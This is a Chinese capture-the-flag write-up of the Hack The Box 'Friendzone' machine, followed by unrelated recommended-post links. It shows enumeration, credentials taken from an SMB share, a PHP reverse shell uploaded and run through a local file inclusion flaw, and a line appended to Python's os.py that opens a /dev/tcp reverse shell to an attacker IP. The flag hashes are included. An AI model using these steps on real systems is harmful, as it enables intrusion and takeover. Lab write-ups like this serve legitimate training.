[Meachines] [Easy] Friendzone LFI+Python-OS库污染权限提升

Мартин.2024-07-30 10:22

信息收集

IP Address Opening Ports
10.10.10.123 TCP:21,22,53,80,139,443,445

$ nmap -p- 10.10.10.123 --min-rate 1000 -sC -sV

bash 复制代码 
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
| tls-alpn:
|_  http/1.1
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
|_http-title: 404 Not Found
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)

SMB


$ enum4linux 10.10.10.123

$ dig axfr friendzone.red @10.10.10.123

$ smbclient //10.10.10.123/general

smb: \> get creds.txt

username:admin
password:WORKWORKHhallelujah@#

HTTPS

# echo '10.10.10.123 friendzone.red administrator1.friendzone.red hr.friendzone.red uploads.friendzone.red '>>/etc/hosts

https://friendzone.red/

$ gobuster dir -u "https://administrator1.friendzone.red" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x txt,php -b 404,403 -t 50 -k

LFI

username:admin
password:WORKWORKHhallelujah@#

https://administrator1.friendzone.red/login.php

https://administrator1.friendzone.red/dashboard.php

$ smbclient //10.10.10.123/Development

smb: \> put php-reverse-shell.php
smb: \> put pspy32

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/php-reverse-shell

User.txt

ad2906258fb6679290609a6b243b6078

权限提升

$ cp /etc/Development/pspy32 /tmp

$ chmod +x /tmp/pspy32

$ /tmp/pspy32

$ cat /opt/server_admin/reporter.py

$ ls -la /usr/lib/python2.7/os.py

$ echo 'system("/bin/bash -c \"/bin/sh -i >& /dev/tcp/10.10.16.6/10033 0>&1\"")' >> /usr/lib/python2.7/os.py

Root.txt

253809a3fa48b78d59b7884199f37b35

相关推荐
冷雨夜中漫步8 小时前
Python快速入门(6)——for/if/while语句
开发语言·经验分享·笔记·python
郝学胜-神的一滴8 小时前
深入解析Python字典的继承关系:从abc模块看设计之美
网络·数据结构·python·程序人生
百锦再8 小时前
Reactive编程入门:Project Reactor 深度指南
前端·javascript·python·react.js·django·前端框架·reactjs
m0_7369191010 小时前
C++代码风格检查工具
开发语言·c++·算法
喵手10 小时前
Python爬虫实战:旅游数据采集实战 - 携程&去哪儿酒店机票价格监控完整方案(附CSV导出 + SQLite持久化存储)!
爬虫·python·爬虫实战·零基础python爬虫教学·采集结果csv导出·旅游数据采集·携程/去哪儿酒店机票价格监控
2501_9449347310 小时前
高职大数据技术专业,CDA和Python认证优先考哪个?
大数据·开发语言·python
helloworldandy10 小时前
使用Pandas进行数据分析:从数据清洗到可视化
jvm·数据库·python
黎雁·泠崖10 小时前
【魔法森林冒险】5/14 Allen类(三):任务进度与状态管理
java·开发语言
2301_7634724611 小时前
C++20概念(Concepts)入门指南
开发语言·c++·算法
肖永威11 小时前
macOS环境安装/卸载python实践笔记
笔记·python·macos
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03openclaw配置教程(linux+局域网ollama)04UV安装并设置国内源05Linux下V2Ray安装配置指南06AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南07openclaw使用nginx反代部署过程 与disconnected (1008): pairing required解决08Claude Code Skills 实用使用手册09在Trae中使用Pencil MCP10Vue-skills的中文文档